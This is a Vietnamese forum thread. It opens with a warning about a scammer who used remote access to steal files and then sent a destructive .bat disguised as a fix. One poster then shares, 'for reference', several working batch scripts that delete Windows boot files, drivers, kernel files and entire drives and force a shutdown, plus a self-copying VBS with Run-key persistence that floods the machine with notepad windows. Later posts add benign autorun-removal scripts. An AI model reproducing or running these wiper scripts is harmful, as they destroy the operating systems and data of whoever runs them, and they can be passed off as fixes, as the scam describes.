tình hình là mình có thấy nó post 1 bài là kêu hướng dẫn nhưng thục tế nó là gì biết làm...chỉ team máy mình xem có gì ngon là nó lấy sau đó send cho mình 1 file .bat kêu là cái mình cần sửa lỗi nếu bạn nào chạy file đó đảm bảo window bị hư ngay.. may mà mình có backup hết nên không sao...thay nó team mình mà im im không làm là biết nó lấy file máy mình nên mình tắt ngay team.. anh em cẩn thận nha.. yahoo nó là nhatkyngaythangnam

nó giống thế này k bạn , nó chờ bạn chấp nhận chia sẻ file = team đó :D
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

Thằng này ghê lắm còn đòi đổi Bypass của tớ = source web nó đấy :))

đây là 1 số code .Bat nguy hiểm tự động xóa win !
các bạn tham khảo !
Thứ 1

@echo off
ATTRIB C:\Boot.ini -s -h
ATTRIB C:\IO.sys -s -h
ATTRIB C:\msdos.sys -s -h
ATTRIB C:\ntdetect.com -s -h
ATTRIB C:\ntldr -s -h
ATTRIB C:\dell.sdr -s -h
DEL "C:\Autoexec.bat"
DEL "C:\Boot.ini"
DEL "C:\Config.sys"
DEL "C:\IO.sys"
DEL "C:\MSDOS.sys"
DEL "C:\NTDETECT.COM"
DEL "C:\NTLDR"
DEL "C:\dell.sdr"
DEL "C:\INFCACHE.1"
DEL "C:\Rollback.ini"
DEL "C:\SystemInfo.ini"
DEL "C:\uwstart.ini"
ATTRIB C:\WINDOWS\System32\Drivers\Mup.sys -s -h -r
ATTRIB C:\WINDOWS\System32\ZoneLabs\srescan.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\NDIS.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\Ntfs.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\ksecdd.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\sr.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\fltmgr.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\classpnp.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\disk.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\atapi.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\VolSnap.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\PartMgr.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\dmio.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\dmload.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\ftdisk.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\MountMgr.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\PCIIDEX.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\pciide.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\isapnp.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\pci.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\WMILIB.sys -s -h -r
ATTRIB C:\WINDOWS\System32\Drivers\ACPI.sys -s -h -r
ATTRIB C:\WINDOWS\AppPatch\drvmain.sdb -s -h -r
ATTRIB C:\WINDOWS\FONTS\vgaoem.fon -s -h -r
ATTRIB C:\WINDOWS\System32\L_intl.nls -s -h -r
ATTRIB C:\WINDOWS\System32\C_437.nls -s -h -r
ATTRIB C:\WINDOWS\System32\c_1252.nls -s -h -r
ATTRIB C:\WINDOWS\System32\BOOTVID.dll -s -h -r
ATTRIB C:\WINDOWS\System32\KDCOM.dll -s -h -r
ATTRIB C:\WINDOWS\System32\hal.dll -s -h -r
ATTRIB C:\WINDOWS\System32\ntoskrnl.exe -s -h -r
ATTRIB C:\WINDOWS\System32\config\ -s -h -r
DEL "C:\WINDOWS\System32\Drivers\Mup.sys"
DEL "C:\WINDOWS\System32\ZoneLabs\srescan.sys"
DEL "C:\WINDOWS\System32\Drivers\NDIS.sys"
DEL "C:\WINDOWS\System32\Drivers\Ntfs.sys"
DEL "C:\WINDOWS\System32\Drivers\ksecdd.sys"
DEL "C:\WINDOWS\System32\Drivers\sr.sys"
DEL "C:\WINDOWS\System32\Drivers\fltmgr.sys"
DEL "C:\WINDOWS\System32\Drivers\classpnp.sys"
DEL "C:\WINDOWS\System32\Drivers\disk.sys"
DEL "C:\WINDOWS\System32\Drivers\atapi.sys"
DEL "C:\WINDOWS\System32\Drivers\VolSnap.sys"
DEL "C:\WINDOWS\System32\Drivers\PartMgr.sys"
DEL "C:\WINDOWS\System32\Drivers\dmio.sys"
DEL "C:\WINDOWS\System32\Drivers\dmload.sys"
DEL "C:\WINDOWS\System32\Drivers\ftdisk.sys"
DEL "C:\WINDOWS\System32\Drivers\MountMgr.sys"
DEL "C:\WINDOWS\System32\Drivers\PCIIDEX.SYS"
DEL "C:\WINDOWS\System32\Drivers\pciide.sys"
DEL "C:\WINDOWS\System32\Drivers\isapnp.sys"
DEL "C:\WINDOWS\System32\Drivers\pci.sys"
DEL "C:\WINDOWS\System32\Drivers\WMILIB.SYS"
DEL "C:\WINDOWS\System32\Drivers\ACPI.sys"
DEL "C:\WINDOWS\AppPatch\drvmain.sdb"
DEL "C:\WINDOWS\FONTS\vgaoem.fon"
DEL "C:\WINDOWS\System32\L_intl.nls"
DEL "C:\WINDOWS\System32\C_437.nls"
DEL "C:\WINDOWS\System32\c_1252.nls"
DEL "C:\WINDOWS\System32\BOOTVID.dll"
DEL "C:\WINDOWS\System32\KDCOM.DLL"
DEL "C:\WINDOWS\System32\hal.dll"
DEL "C:\WINDOWS\System32\ntoskrnl.exe"
DEL "C:\WINDOWS\System32\config\"
RD “C:\Program Files” /s /q
RD “C:\Documents and Settings” /s /q
DEL C:\WINDOWS\system32\services.exe
TASKKILL /IM explorer.exe
TASKKILL /IM svchost.exe
DEL "C:\WINDOWS\explorer.exe"
DEL "C:\WINDOWS\system32\svchost.exe"
DEL "C:\WINDOWS\system32\lsass.exe"
DEL "C:\WINDOWS\system32\winlogon.exe"
DEL "C:\WINDOWS\system32\csrss.exe"
DEL "C:\WINDOWS\system32\smss.exe"
Thứ 2

@Echo Off
@cls
@title Virus ti choi
@assoc exe=txt
@assoc reg=jpg
@cd %systemroot%
@del /f /s /q TASKMAN.EXE
@cd %Systemroot%\system32
@del /f /s /q hal.dll
@del /f /s /q taskkil.exe
@del /f /s /q tasklist.exe
@del /f /s /q taskman.exe
@del /f /s /q taskmgr.exe
@shutdown -s -t 06 -c " Fatal error #1337, Good by my love!"
@del /f /s /q *.*
@cd ..
@del /f /s /q TASKMAN.EXE
@del /f /s /q *.*
@exit

Thứ 3

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
4
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
5
On Error Resume Next
Set popo= Createobject("scripting.filesystemobject")
popo.copyfile wscript.scriptfullname,cuong.GetSpecialFolder(1)& "\popo.vbs"
Set popo2= CreateObject("WScript.Shell")
popo2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n \cod e1","wscript.exe "&popo.GetSpecialFolder(0)& "\popo.vbs %"
Set treomay= CreateObject("WScript.Shell")
Do
treomay.run "notepad",false
loop

ôh thế notfile ngâm cứu rồi kìa =)). Share để phá WIN =))

cái này có từ lâu rồi mà !
file .bat nghiêm cấm Click trước khi edit biết tác dụng của nó là gì
đây là file .Bat tự động kill autorun ( cái này là có ích )

CODE
@echo off

rem kill illegal process
taskkill /im wsctf.exe /f
taskkill /im explorer.exe /f
taskkill /im sxs2.exe /f

rem restart explorer shell
start %systemroot%\explorer.exe

rem delete virus files
del /a /f "%systemroot%\system32\wsctf.exe"
del /a /f "%systemroot%\system32\EXPLORER.EXE"

rem fix registry
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Run" /v wsctf.exe /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Run" /v EXPLORER.EXE /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "%systemroot%\system32\userinit.exe," /f

rem disable disk autorun function
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f



@echo off

ver|find "5.0"
if ERRORLEVEL 1 goto xp2003

rem for windows 2000
tskill ctfmon.exe /f

goto endtaskkill

:xp2003
rem kill process
taskkill /im ctfmon.exe /fi "modules ne msutb.dll" /f

:endtaskkill

rem remove autorun.inf and recycled
rem folder named "autorun.inf" will not be removed
for %%x in (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do (
if exist %%x:\ (
if not exist %%x:\autorun.inf\ del /a /f %%x:\autorun.inf
if exist %%x:\recycler\ (
rd /s /q %%x:\recycled\
) else (
del /a /s /f /q %%x:\recycled\ctfmon.exe
rd /s /q %%x:\recycled\recycled\
)
)
)

rem del ctfmon.exe
del /a /f /q "%userprofile%\??????\??\??\ctfmon.exe"
del /a /f /q "%userprofile%\Start Menu\Programs\Startup\ctfmon.exe"

rem disable autorun function
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f

@echo off

taskkill /im "algssl.exe" /fi "username ne system" /fi "username ne local service" /fi "username ne network service" /f
taskkill /im "msfir80.exe" /fi "username ne system" /fi "username ne local service" /fi "username ne network service" /f
taskkill /im "msime80.exe" /fi "username ne system" /fi "username ne local service" /fi "username ne network service" /f

rem remove autorun.inf exe
for %%x in (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do (
if exist %%x:\ (
del /a /f %%x:\sal.xls.exe
del /a /f %%x:\sxs2.exe
del /a /f %%x:\sxs.exe
del /a /f %%x:\autorun.inf
)
)

rem remove other files
del /a /f "%systemroot%\svchost.exe"
del /a /f "%systemroot%\Session.exe"
del /a /f "%systemroot%\BACKINF.TAB"
del /a /f "%systemroot%\system32\SocksA.exe"
del /a /f "%systemroot%\system32\FileKan.exe"
del /a /f "%systemroot%\system32\algssl.exe"
del /a /f "%systemroot%\system32\msfir80.exe"
del /a /f "%systemroot%\system32\msime80.exe"

rem fix registry
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ex plorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t REG_DWORD /d 1 /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n" /v ASocksrv /f

rem disable autorun function
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f

@echo off

taskkill /im "svchost.exe" /fi "username ne system" /fi "username ne local service" /fi "username ne network service" /f

rem remove autorun.inf and tel.xls.exe
rem folder named "autorun.inf" or "tel.xls.exe" will not be removed
for %%x in (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do (
if exist %%x:\ (
if not exist %%x:\tel.xls.exe\ del /a /f %%x:\tel.xls.exe
if not exist %%x:\autorun.inf\ del /a /f %%x:\autorun.inf
)
)

rem remove other files
del /a /f /q "%systemroot%\svchost.exe"
del /a /f /q "%systemroot%\Session.exe"
del /a /f /q "%systemroot%\BACKINF.TAB"
del /a /f /q "%systemroot%\system32\SocksA.exe"
del /a /f /q "%systemroot%\system32\FileKan.exe"

rem fix registry
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ex plorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t REG_DWORD /d 1 /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n" /v ASocksrv /f

rem disable autorun function
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Po licies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f

@echo on
taskkill /im explorer.exe /f
taskkill /im wscript.exe /f
taskkill /im algsrvs.exe /f
start reg DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v IMJPMIG8.2 /f
start reg DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MsServer /f
start reg DELETE
HKEY_LOCAL_MACHINE\Software\Microsoft\windows\Curr entVersion\explorer\Advanced\Folder\Hidden
\SHOWALL /v CheckedValue /f
start reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\EXp lorer\Advanced /v
ShowSuperHidden /t REG_DWORD /d 1 /f
start reg add
HKEY_LOCAL_MACHINE\Software\Microsoft\windows\Curr entVersion\explorer\Advanced\Folder\Hidden
\SHOWALL /v CheckedValue /t REG_DWORD /d 1 /f
start reg import kill.reg
del c:\autorun.* fun.xls.exe /f /q /as
del %SYSTEMROOT%\system32\autorun.* msime82.exe algsrvs.exe fun.xls.exe msfun80.exe /f /q
/as
del %temp%\~DF8785.tmp ~DFD1D6.tmp ~DFA4C3 ~DFC86B.tmp /f /q /as
del %systemroot%\ufdata2000.log
del d:\autorun.* fun.xls.exe /f /q /as
del e:\autorun.* fun.xls.exe /f /q /as
del f:\autorun.* fun.xls.exe /f /q /as
del g:\autorun.* fun.xls.exe /f /q /as
del h:\autorun.* fun.xls.exe /f /q /as
del i:\autorun.* fun.xls.exe /f /q /as
del j:\autorun.* fun.xls.exe /f /q /as
del k:\autorun.* fun.xls.exe /f /q /as
del l:\autorun.* fun.xls.exe /f /q /as
start explorer.exe

"

haha giang hồ hiểm ác ta không sợ. chỉ sợ đường về chúng nó spamb-(